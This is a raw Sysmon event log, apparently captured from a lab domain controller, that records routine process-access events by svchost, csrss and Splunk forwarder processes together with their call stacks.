10341000x80000000000000007064Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:58:16.415{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007063Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:58:16.415{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007062Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:58:16.415{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007061Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:58:16.415{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007060Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:58:16.415{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007059Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:58:16.415{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007058Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:58:16.415{D28789B6-7C62-5FA1-0500-000000008801}6441152C:\Windows\system32\csrss.exe{D28789B6-7E18-5FA1-8C01-000000008801}1512C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007057Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:58:16.415{D28789B6-7CDA-5FA1-0E01-000000008801}15923548C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{D28789B6-7E18-5FA1-8C01-000000008801}1512C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000007056Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:58:16.415{D28789B6-7E18-5FA1-8C01-000000008801}1512C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{D28789B6-7C62-5FA1-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{D28789B6-7CDA-5FA1-0E01-000000008801}1592C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000007091Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:59:01.762{D28789B6-7C64-5FA1-0D00-000000008801}10002268C:\Windows\system32\svchost.exe{D28789B6-7C64-5FA1-1300-000000008801}1224C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007090Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:59:01.762{D28789B6-7C64-5FA1-0D00-000000008801}10002268C:\Windows\system32\svchost.exe{D28789B6-7C99-5FA1-7C00-000000008801}3632C:\Windows\system32\WinrsHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007089Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:59:01.762{D28789B6-7C64-5FA1-0D00-000000008801}10002268C:\Windows\system32\svchost.exe{D28789B6-7C8C-5FA1-7900-000000008801}4256C:\Windows\system32\WinrsHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007088Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:59:01.762{D28789B6-7C64-5FA1-0D00-000000008801}10002268C:\Windows\system32\svchost.exe{D28789B6-7C8C-5FA1-7700-000000008801}4164C:\Windows\system32\WinrsHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007087Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:59:01.762{D28789B6-7C64-5FA1-0D00-000000008801}10002268C:\Windows\system32\svchost.exe{D28789B6-7C8C-5FA1-7500-000000008801}5104C:\Windows\system32\WinrsHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007086Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:59:01.762{D28789B6-7C64-5FA1-0D00-000000008801}10002268C:\Windows\system32\svchost.exe{D28789B6-7C74-5FA1-4800-000000008801}2436C:\Windows\system32\wbem\wmiprvse.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007085Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:59:01.762{D28789B6-7C64-5FA1-0D00-000000008801}10002268C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-3A00-000000008801}3612C:\Windows\System32\vds.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007084Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:59:01.762{D28789B6-7C64-5FA1-0D00-000000008801}10002268C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-3700-000000008801}3084C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007083Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:59:01.762{D28789B6-7C64-5FA1-0D00-000000008801}10002268C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-3500-000000008801}2768C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007082Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:59:01.762{D28789B6-7C64-5FA1-0D00-000000008801}10002268C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-3800-000000008801}3268C:\Windows\system32\wbem\unsecapp.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007081Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:59:01.762{D28789B6-7C64-5FA1-0D00-000000008801}10002268C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007080Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:59:01.762{D28789B6-7C64-5FA1-0D00-000000008801}10002268C:\Windows\system32\svchost.exe{D28789B6-7C62-5FA1-0B00-000000008801}868C:\Windows\system32\lsass.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007079Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:59:01.762{D28789B6-7C64-5FA1-0D00-000000008801}10002268C:\Windows\system32\svchost.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007078Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:59:01.762{D28789B6-7C64-5FA1-0D00-000000008801}10002268C:\Windows\system32\svchost.exe{D28789B6-7C64-5FA1-1600-000000008801}1544C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007077Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:59:01.762{D28789B6-7C64-5FA1-0D00-000000008801}10002268C:\Windows\system32\svchost.exe{D28789B6-7C64-5FA1-1000-000000008801}1144C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007076Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:59:01.762{D28789B6-7C64-5FA1-0D00-000000008801}10002268C:\Windows\system32\svchost.exe{D28789B6-7C64-5FA1-0E00-000000008801}1080C:\Windows\system32\LogonUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007075Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:59:01.762{D28789B6-7C64-5FA1-0D00-000000008801}10002268C:\Windows\system32\svchost.exe{D28789B6-7C64-5FA1-0E00-000000008801}1080C:\Windows\system32\LogonUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007074Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:59:01.762{D28789B6-7C64-5FA1-0D00-000000008801}10002268C:\Windows\system32\svchost.exe{D28789B6-7C64-5FA1-1100-000000008801}1204C:\Windows\system32\dwm.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007073Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:59:01.762{D28789B6-7C64-5FA1-0D00-000000008801}10002268C:\Windows\system32\svchost.exe{D28789B6-7C64-5FA1-0E00-000000008801}1080C:\Windows\system32\LogonUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007072Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:59:01.762{D28789B6-7C64-5FA1-0D00-000000008801}10002268C:\Windows\system32\svchost.exe{D28789B6-7C64-5FA1-1400-000000008801}1312C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007071Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:59:01.762{D28789B6-7C64-5FA1-0D00-000000008801}10002268C:\Windows\system32\svchost.exe{D28789B6-7C64-5FA1-0F00-000000008801}1136C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007070Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:59:01.762{D28789B6-7C64-5FA1-0D00-000000008801}10002268C:\Windows\system32\svchost.exe{D28789B6-7C64-5FA1-1000-000000008801}1144C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007069Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:59:01.762{D28789B6-7C64-5FA1-0D00-000000008801}10002268C:\Windows\system32\svchost.exe{D28789B6-7C64-5FA1-0C00-000000008801}608C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007117Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:59:11.903{D28789B6-7CDA-5FA1-1201-000000008801}38764476C:\Windows\system32\conhost.exe{D28789B6-7E4F-5FA1-8E01-000000008801}2880C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007116Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:59:11.903{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007115Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:59:11.903{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007114Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 